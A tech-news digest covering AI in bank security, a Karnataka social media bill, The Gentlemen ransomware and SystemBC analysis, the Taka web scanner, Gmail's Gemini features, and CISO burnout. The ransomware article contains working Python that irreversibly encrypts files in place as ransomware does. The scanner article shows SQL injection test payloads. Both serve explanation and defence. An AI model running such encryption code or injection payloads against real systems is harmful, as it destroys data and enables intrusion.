

All the recent news you need to know

Wall Street Banks Test Anthropic Mythos AI as Regulators Warn of Rising Cybersecurity Threats


Early tests of cutting-edge AI aimed at strengthening cyber resilience are now under way in high-security finance circles, driven by rising regulatory unease over AI-enabled threats. Leading the charge is an emerging system called Mythos, developed by Anthropic, notable not just for spotting code flaws but for actively probing them under controlled conditions.

Mythos gives banks an early look at hidden flaws in their networks before attackers can exploit them. Rather than waiting for intrusions, some institutions are beginning to use artificial intelligence to mimic live hacking attempts across vast operations, shifting security from passive observation toward active testing driven by machines that learn attacker behavior. Instead of raising alarms after an intrusion, these systems predict the paths criminals might follow, and detection tools evolve from fixed rules into adaptive models shaped by constant simulation. The transformation is happening quietly, through repeated digital trials beneath the surface rather than with fanfare.

What is pushing these tests forward? Part of the momentum comes from alerts issued by American regulatory bodies highlighting the rising risks that artificial intelligence poses in cyber threats. As AI systems grow more capable, officials warn, they could let attackers run breaches automatically, uncover system weaknesses faster, and strike vital operations, banks included, with greater precision. Though subtle, the shift marks a turning point in how digital dangers evolve.

One reason Mythos stands out is its ability to analyze enormous amounts of code quickly, detecting hidden bugs that other tools miss and giving security teams deeper insight into weak spots. What makes the model unusual is how it links separate issues to map multi-step exploits. Although some worry such power could be misapplied, financial institutions see value in testing their systems against lifelike threats. Most cyber specialists note that banking faces outsized risk because its systems are deeply interconnected and hold highly valuable information.

A small flaw can spread widely, disrupting transactions, markets, and sometimes personal records. Tools powered by artificial intelligence, Mythos among them, may detect weaknesses sooner than traditional methods. Meanwhile, regulatory bodies are urging stricter supervision and more clearly defined guidelines governing AI applications in finance. Their worries extend beyond outside dangers to the internal weaknesses that can emerge when AI tools lack proper governance inside organizations.

While safety is a priority, so is preventing system failures caused by weak oversight structures. Anthropic has restricted access to Mythos, allowing only select groups to test the system under tight conditions. Where some push for fast progress, this move leans toward care over speed: responsibility, not just raw capability, shapes how powerful tools spread.

As Wall Street banks assess artificial intelligence for cyber protection, one fact stands out: threats are shifting faster than ever. Institutions that blend AI into their security efforts may stay ahead, but success depends on steady monitoring, strong protective layers, and constant updates as new dangers appear.

Karnataka Unveils AI-Driven Bill to Enforce Swift Social Media Safety


Karnataka is set to revolutionize social media regulation with the draft Karnataka Responsible Social Media & Digital Safety Bill, 2026, submitted to Chief Minister Siddaramaiah. Prepared by the Karnataka State Policy and Planning Commission (KSPPC), this legislation emphasizes artificial intelligence (AI), rapid content moderation, and robust user protections, marking India's first state-level, AI-compliant, citizen-centric digital safety framework. S Mohanadass Hegde, a KSPPC member, highlighted its potential to foster responsible digital citizenship amid rising AI-driven threats. 

The primary focus is on tackling AI-generated content and deepfakes through mandatory labelling, precise legal definitions, and strict penalties for misuse. Platforms face enforceable timelines and are required to remove harmful content within 24 to 48 hours, shifting from advisory central guidelines to binding state actions. This departs from national laws like the Information Technology Act, 2000, and IT Rules, 2021, which prioritize due diligence without such tight deadlines.

The bill establishes the Karnataka Digital Safety & Social Media Regulatory Authority to monitor compliance and address region-specific digital risks swiftly. Users gain rights to report harmful content, access time-bound grievance redressal, and protections against harassment and misinformation. Hegde noted that localized oversight enables faster responses than central bodies, enhancing enforcement through tech tools like fake news detection, deepfake tracking, and real-time dashboards. 

Prevention takes center stage with a digital awareness and media literacy program promoting fact-checking, critical thinking, and responsible online behavior. This educational push targets mental well-being, particularly for youth vulnerable to harmful trends and addiction risks, balancing punishment with proactive measures. A team member emphasized education as key to curbing violations before they escalate. Implementation unfolds in phases: initial awareness and institutional setup, followed by technology integration and full enforcement. Slated for legal vetting and monsoon session introduction in June-July 2026, the draft positions Karnataka as a leader in decentralized digital governance, offering a blueprint for other states amid evolving AI challenges.

SystemBC Infrastructure Breach Sheds Light on The Gentlemen Ransomware Network


Operators of The Gentlemen ransomware appear to employ public channels to reinforce coercion, selectively disclosing victim information to increase pressure and speed up payment, a hybrid strategy that combines technical sophistication with calculated psychological leverage.

A recent Check Point analysis further contextualizes the scale of the operation: telemetry from a single SystemBC command-and-control node revealed 1,570 compromised systems. Acting as a covert access facilitator, the malware establishes SOCKS5-based tunneling within infected environments while communicating with its control infrastructure over RC4-encrypted channels.
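To see why RC4 wrapping matters for detection, consider a minimal sketch. This is illustrative Python, not SystemBC's actual code (its key scheduling and message framing are not described here): the point is simply that a plaintext beacon becomes signature-resistant random-looking bytes on the wire, while the same routine recovers it.

```python
# Minimal RC4, for illustration only. A hypothetical C2 check-in encrypted
# this way defeats naive plaintext signature matching on network traffic.

def rc4(key: bytes, data: bytes) -> bytes:
    # Key-scheduling algorithm (KSA): permute the state array using the key
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA): XOR keystream with data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)

beacon = b"GET /tasks HTTP/1.1"            # hypothetical check-in message
wire = rc4(b"session-key", beacon)         # opaque bytes on the wire
assert rc4(b"session-key", wire) == beacon  # RC4 is its own inverse
```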

Beyond providing persistent remote access, this architecture allows staged delivery of secondary payloads, deployed either to disk or directly in memory, which complicates traditional detection mechanisms. Since surfacing in July 2025, The Gentlemen have rapidly expanded their operational tempo, with hundreds of victims publicly listed on the group's leak infrastructure, underscoring the efficiency of its affiliate model and its double-extortion strategy.

There is still no definitive indication of the initial intrusion vector, but observed attack patterns suggest exposed services and credential compromise, followed by a structured intrusion lifecycle of reconnaissance, propagation, and tool deployment, including frameworks such as Cobalt Strike and SystemBC.

Of particular concern is the group's use of Group Policy Objects to propagate malicious components across domains, indicating a degree of post-exploitation control that lets attackers scale their impact quickly while remaining stealthy. SystemBC's broader technical background provides important context for its role in this campaign: the family traces to at least 2019, when it was designed as covert SOCKS5 tunneling and proxying malware.

Over the past several years, its evolution into a payload delivery mechanism has made it particularly appealing to ransomware operators, who exploit its ability to discreetly deploy and execute secondary tools within compromised environments. Despite partial disruption attempts by law enforcement in 2024, SystemBC's infrastructure has proven highly resilient, and prior threat intelligence indicates sustained activity at scale, including the compromise of large numbers of commercial virtual private servers used to relay malicious traffic.

The majority of victims associated with its deployment are located in enterprise-intensive regions such as the United States, the United Kingdom, Germany, Australia, and Romania, supporting the assessment that infections largely result from human-operated intrusions rather than indiscriminate mass exploitation. The observed attack workflows reflect a high degree of operational control following compromise.

Researchers found that attackers operated from domain controllers with elevated administrative privileges to validate credentials, perform reconnaissance, and move laterally. A variety of tools associated with advanced intrusion sets was deployed to extend access across networked systems, often through remote procedure calls, including credential-harvesting utilities such as Mimikatz and adversary simulation frameworks such as Cobalt Strike.

After staging the ransomware payload internally, the attackers propagated it through native mechanisms such as Group Policy Objects, producing near-simultaneous execution across domain-joined assets. The encryption routine uses a hybrid cryptographic model: elliptic curve key exchange generates unique ephemeral keys per file, combined with high-speed symmetric encryption, and partial encryption strategies are applied to shorten execution time on larger datasets.
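As a rough illustration of that hybrid scheme, the sketch below pairs an ephemeral X25519 exchange per file with AES-CTR and a simple intermittent-encryption stride, using Python's cryptography package. The key sizes, stride, and metadata layout here are assumptions chosen for clarity; the article does not disclose The Gentlemen's actual parameters.

```python
# Sketch of per-file hybrid encryption: ephemeral ECDH + symmetric cipher +
# partial encryption. Illustrative only, not the actual ransomware routine.
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

# Stands in for an attacker public key embedded in the binary (hypothetical).
ATTACKER_PUB = X25519PrivateKey.generate().public_key()

def encrypt_file(path: str, chunk: int = 1 << 20, stride: int = 10 << 20) -> None:
    eph = X25519PrivateKey.generate()          # fresh ephemeral key per file
    shared = eph.exchange(ATTACKER_PUB)        # ECDH shared secret
    key = HKDF(hashes.SHA256(), 32, None, b"file-key").derive(shared)
    nonce = os.urandom(16)
    enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    with open(path, "r+b") as f:
        pos = 0
        while True:
            # Partial encryption: 1 MiB encrypted out of every 10 MiB, which
            # is why large datasets can be rendered unusable so quickly.
            f.seek(pos)
            block = f.read(chunk)
            if not block:
                break
            f.seek(pos)
            # CTR is a stream cipher: decryption must walk chunks in the
            # same order so the keystream lines up.
            f.write(enc.update(block))
            pos += stride
    # Only the ephemeral public key and nonce are kept; deriving the AES key
    # again requires the attacker's private half of the exchange.
    with open(path + ".meta", "wb") as m:
        m.write(eph.public_key().public_bytes(Encoding.Raw, PublicFormat.Raw))
        m.write(nonce)
```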

In addition to encrypting files, the malware systematically disables databases, backup services, and virtualisation processes, including forcefully shutting down virtual machines in ESXi environments, and deletes shadow copies and system logs to hinder recovery and forensic investigation. Some uncertainty remains about the precise role of SystemBC within The Gentlemen's broader operational stack, particularly whether it is centrally managed or affiliate-driven.

The convergence of proxy malware, post-exploitation frameworks, and a significant botnet footprint suggests a maturing and modular threat model. Researchers conclude that this integration marks a transition toward structured and scalable attack orchestration, supported by shared infrastructure and tooling.

The defensive guidance incorporates signature-based detection artifacts such as YARA rules, along with detailed indicators of compromise, to help organizations identify and mitigate similar intrusion patterns before they escalate into a full-scale ransomware attack.
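As a sketch of how such guidance might be consumed during triage, the snippet below compiles and runs a YARA rule with the yara-python package. The rule shown is a hypothetical placeholder, not a real SystemBC signature; in practice you would load the vendor-published rules instead.

```python
# Illustrative use of yara-python to scan a suspect file against a rule.
import yara

RULE = r"""
rule systembc_placeholder
{
    strings:
        $s1 = "BEGINDATA" ascii      // hypothetical marker string
        $s2 = { 73 6F 63 6B 73 35 }  // "socks5" as hex, also hypothetical
    condition:
        any of them
}
"""

rules = yara.compile(source=RULE)          # swap in published rule files here
for match in rules.match(filepath="suspect.bin"):
    print(match.rule, match.strings)       # which rule fired, and where
```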


DARWIS Taka: A Web Vulnerability Scanner with AI-Powered Validation


DARWIS Taka, a new web vulnerability scanner, is now available for free and runs via Docker. It pairs a rules-based scanning engine with an optional AI layer that reviews each finding before it reaches the report, aimed squarely at the false-positive problem that has dogged vulnerability scanning for years.

Built in Rust, Taka ships with 88 detection rules across 29 categories covering common web vulnerabilities, and produces JSON or self-contained HTML reports. Setup instructions, the Docker configuration, and documentation are published on GitHub at github.com/CSPF-Founder/taka-docker.

Two modes of AI validation

Taka's AI layer runs in one of two modes. In passive (evidence-analysis) mode, the model reviews the data the scanner already collected and returns a verdict without sending any further traffic to the target. In active mode, the AI acts as a second-stage tester: it proposes a small number of targeted follow-up requests, such as paired true and false payloads for a suspected SQL injection, Taka executes them, and the responses are fed back to the AI for differential analysis. Active mode is more decisive on borderline findings but generates additional traffic.
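As a sketch of the differential technique active mode relies on for a suspected SQL injection (illustrative only, not Taka's internal code): send a boolean-true and a boolean-false payload against the same parameter, then compare the responses. A genuine injection point makes the two diverge, while a false positive returns near-identical pages.

```python
# Differential SQLi check: paired true/false payloads, response comparison.
import difflib
import requests

def differential_sqli_check(url: str, param: str, base: str) -> bool:
    # Boolean-true payload: should behave like the normal page if injectable.
    true_resp = requests.get(url, params={param: base + "' AND '1'='1"}, timeout=10)
    # Boolean-false payload: should change the page if the input hits a query.
    false_resp = requests.get(url, params={param: base + "' AND '1'='2"}, timeout=10)
    similarity = difflib.SequenceMatcher(
        None, true_resp.text, false_resp.text).ratio()
    # Sharply diverging responses suggest the parameter reaches a SQL query;
    # the 0.9 cutoff is an assumption for illustration.
    return similarity < 0.9

# Hypothetical usage:
# differential_sqli_check("https://example.com/item", "id", "42")
```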

In both modes, every result is tagged with a verdict (confirmed, likely false positive, or inconclusive), a confidence score, and the AI's written reasoning. The report surfaces those labels alongside a summary of how many findings fell into each bucket. Nothing is dropped silently, so reviewers see what the AI believed and why, and can focus triage on the findings marked confirmed.

The validation layer currently supports Anthropic and OpenAI. The project team has tested Taka extensively with Anthropic's Claude Sonnet, which gave the best balance of reasoning quality and speed in their evaluation, and recommends it for the strongest results. AI validation is optional; without a key, Taka runs as a standard scanner with its own false-positive controls.

Scoring by evidence, not by single matches

Most scanners trigger on the first matcher that fires, which is why a single stray string in a response can produce a flood of bogus alerts. Taka uses a weighted scoring system instead. Each matcher in a rule, whether a status code, a regex, a header check, or a timing comparison, carries an integer weight reflecting how strong a signal it is. The rule declares a detection threshold, and a finding is raised only when the combined weight of the matchers that fired meets or exceeds that threshold.
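A minimal sketch of that idea (Taka itself is written in Rust; this hypothetical Python version just illustrates the scoring): each matcher contributes its weight only if it fires, and the finding is raised only when the combined weight crosses the rule's threshold.

```python
# Weighted matcher scoring: no single weak signal can raise a finding alone.
import re
from dataclasses import dataclass
from typing import Callable

@dataclass
class Matcher:
    weight: int
    fires: Callable[[dict], bool]   # predicate over a response dict

@dataclass
class Rule:
    name: str
    threshold: int
    matchers: list

def evaluate(rule: Rule, response: dict) -> bool:
    score = sum(m.weight for m in rule.matchers if m.fires(response))
    return score >= rule.threshold

# Hypothetical rule: a stray "syntax error" string alone (weight 2) cannot
# reach the threshold of 5; it needs a corroborating 500 status (weight 3).
sql_error_rule = Rule(
    name="sql-error-disclosure",
    threshold=5,
    matchers=[
        Matcher(3, lambda r: r["status"] == 500),
        Matcher(2, lambda r: re.search(r"syntax error", r["body"], re.I) is not None),
    ],
)

print(evaluate(sql_error_rule, {"status": 500, "body": "SQL syntax error near"}))  # True
print(evaluate(sql_error_rule, {"status": 200, "body": "a syntax error alone"}))   # False
```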

Built to run against real systems

A circuit breaker halts scanning against hosts showing signs of distress, per-host rate limiting caps concurrent requests, and a passive mode disables all attack payloads for environments where only non-intrusive checks are acceptable. Three scan depth levels (quick, standard, deep) trade coverage against runtime, while a two-phase execution model keeps time-based blind rules from interfering with the rest of the scan.
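The circuit-breaker idea can be sketched in a few lines; the trip condition below (consecutive failures followed by a cooldown) is an assumption chosen for illustration, not Taka's actual heuristic for detecting host distress.

```python
# Simple circuit breaker: stop hammering a host that keeps failing.
import time

class CircuitBreaker:
    def __init__(self, max_failures: int = 5, cooldown: float = 60.0):
        self.max_failures = max_failures
        self.cooldown = cooldown
        self.failures = 0
        self.tripped_at = None

    def record(self, ok: bool) -> None:
        # Consecutive failures suggest the host is struggling; trip the breaker.
        self.failures = 0 if ok else self.failures + 1
        if self.failures >= self.max_failures:
            self.tripped_at = time.monotonic()

    def allow(self) -> bool:
        if self.tripped_at is None:
            return True
        if time.monotonic() - self.tripped_at >= self.cooldown:
            # Half-open after the cooldown: permit one probe to test recovery.
            self.tripped_at, self.failures = None, 0
            return True
        return False
```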

A web interface ships with the tool for launching scans, inspecting findings alongside the raw evidence, and revisiting results.

Only the optional AI validation requires a third-party API key, supplied by the user. Taka is aimed at security engineers, penetration testers, bug bounty hunters, DevSecOps teams, and developers who want a scanner that respects their triage time.

Full setup instructions are available at github.com/CSPF-Founder/taka-docker.

Google Expands Gemini in Gmail, Forcing Billions to Reconsider Privacy, Control, and AI Dependence

Google has introduced one of the most extensive updates to Gmail in its history, warning that the scale of change driven by artificial intelligence may feel overwhelming for users. While some discussions have focused on surface-level changes such as switching email addresses, the company has emphasized that the real transformation lies in how AI is now embedded into everyday tools used by nearly two billion people. This shift requires far more serious attention.

At the center of this evolution is Gemini, Google’s artificial intelligence system, which is being integrated more deeply into Gmail and other core services. In a recent update shared through a short video message, Gmail’s product leadership acknowledged that the rapid pace of AI innovation can leave users feeling overloaded, with too many new features and decisions emerging at once.

Gmail has traditionally been built around convenience, scale, and seamless integration rather than strict privacy-first principles. Although its spam filters and malware detection systems are widely used and generally effective, they are not flawless. Importantly, Gmail has not typically been the platform users turn to for strong privacy assurances.

The introduction of Gemini changes this balance substantially. Google has clarified that it does not use email content to train its AI models. However, the way these tools function introduces new concerns. Features that automatically draft emails, summarize conversations, or search inbox content require access to emails that may contain highly sensitive personal or professional information.

To address this, Google describes Gemini as a temporary assistant that operates within a limited session. The company compares this interaction to allowing a helper into a private room containing your inbox. The assistant completes its task and then exits, with the accessed information disappearing afterward. According to Google, Gemini does not retain or learn from the data it processes during these interactions.

Despite these assurances, concerns remain. Even if the data is not stored long term, granting a cloud-based AI system access to private communications introduces an inherent level of risk. Additionally, while Google has denied automatically enrolling users into AI training programs, many of these AI-powered features are expected to be enabled by default. This shifts responsibility to users, who must actively decide how much access they are willing to allow.

This is not a decision that can be ignored. Once AI tools become integrated into daily workflows, they are difficult to remove. Relying on default settings or delaying action could result in long-term dependence on systems that users may not fully understand or control.

Shortly after promoting these updates, Gmail experienced a disruption that affected its core functionality. Users reported delays in sending and receiving emails, and Google acknowledged the issue while working on a fix. Initially, no estimated resolution time was provided. Later the same day, the company confirmed that the issue had been resolved.

According to Google’s official status update, the disruption was fixed on April 8, 2026, at 14:49 PDT. The cause was identified as a “noisy neighbor,” a term used in cloud computing to describe a situation where one service consumes excessive shared resources, negatively impacting the performance of others operating on the same infrastructure.

With a user base of approximately two billion, even a short-lived outage is a serious concern. More importantly, it underscores the scale at which Gmail operates and reinforces why decisions around AI integration are critical for users worldwide.

The central issue now facing users is the balance between convenience and security. Google presents Gemini as a helpful and well-behaved assistant that enhances productivity without overstepping boundaries. However, like any guest given access to a private space, it requires clear rules and careful oversight.

This tension becomes even more visible when considering Google’s parallel efforts to strengthen security. The company recently expanded client-side encryption for Gmail on mobile devices. While this may sound similar to end-to-end encryption used in messaging apps, it is not the same. This form of encryption operates at an organizational level, primarily for enterprise users, and does not provide the same device-specific privacy protections commonly associated with true end-to-end encryption.

More critically, enabling this additional layer of encryption significantly limits Gmail's functionality. When it is turned on, several features become unavailable. Users can no longer use confidential mode, access delegated accounts, apply advanced email layouts, or send bulk emails using multi-send options. Features such as suggested meeting times, pop-out or full-screen compose windows, and sending emails to group recipients are also disabled.

In addition, personalization and usability tools are affected. Email signatures, emojis, and printing functions stop working. AI-powered tools, including Google’s intelligent writing and assistance features, are also unavailable. Other smart Gmail features are disabled, and certain mobile capabilities, such as screen recording and taking screenshots on Android devices, are restricted.

These limitations exist because encrypted data cannot be accessed by AI systems. As a result, users are forced to choose between stronger data protection and access to advanced features. The same mechanisms that secure information also prevent AI tools from functioning effectively.

This reflects a bigger challenge across the technology industry. Privacy and security measures often limit the capabilities of AI systems, which depend on access to data to operate. In Gmail’s case, these two priorities do not align easily and, in many ways, directly conflict.

From a wider perspective, this also highlights a fundamental limitation of email itself. The technology was developed in an earlier era and was not designed to handle modern cybersecurity threats. Its underlying structure lacks the robust protections found in newer communication platforms.

As artificial intelligence becomes more deeply integrated into everyday tools, users are being asked to make more informed and deliberate decisions about how their data is used. While Google presents Gemini as a controlled and temporary assistant, the responsibility ultimately lies with users to determine their comfort level.

For highly sensitive communication, relying solely on email may no longer be the safest option. Exploring alternative platforms with stronger built-in security may be necessary. Ultimately, this moment represents a critical choice: whether the convenience offered by AI is worth the level of access it requires.

CISO Burnout Is Costing Businesses More Than Money


Businesses are increasingly feeling the financial and operational impact of CISO burnout, as overstretched security leaders make slower decisions, miss critical signals, and eventually leave their roles. The pressure of rising cyber threats, regulatory demands, and limited resources is turning the CISO position into a high‑turnover, high‑cost liability rather than a strategic asset. 

Why CISOs are burning out 

CISOs today face an “always‑on” workload, with AI‑driven attacks, expanding digital estates, and constant audits leaving little room for rest. Many report chronic stress, decision fatigue, and missed family events, while still working well beyond contracted hours to keep up. Boards often understand the pressure in theory, but fail to translate this into better staffing, budgets, or clearer priorities.

When a burned‑out CISO resigns or takes extended leave, firms pay not only recruitment and onboarding costs, but also the hidden price of lost productivity and disrupted projects. One expert estimates total CISO replacement costs can exceed 200% of salary when incident‑related losses, staff turnover, and delayed IT initiatives are factored in. Incidents that might have been caught earlier are more likely to slip through, raising breach‑related expenses and reputational damage. 

Impact on security and board confidence 

Burnout erodes cyber resilience by weakening threat detection, slowing crisis‑time decisions, and degrading communication of risk to the board. As CISOs disengage, security can become an afterthought, initiatives stall, and internal morale in security teams drops. This visibly undermines confidence at the top, making it harder to secure long‑term investment in modern security programs.

To break the cycle, companies must invest in prevention: realistic job design, adequate headcount, clear mandates, and mental‑health support. Some firms are shifting toward fractional or portfolio‑style CISOs, spreading responsibility and reducing single‑point pressure. Firms that treat CISO well‑being as a core part of risk management will likely see better retention, stronger security posture, and lower overall breach‑related costs.
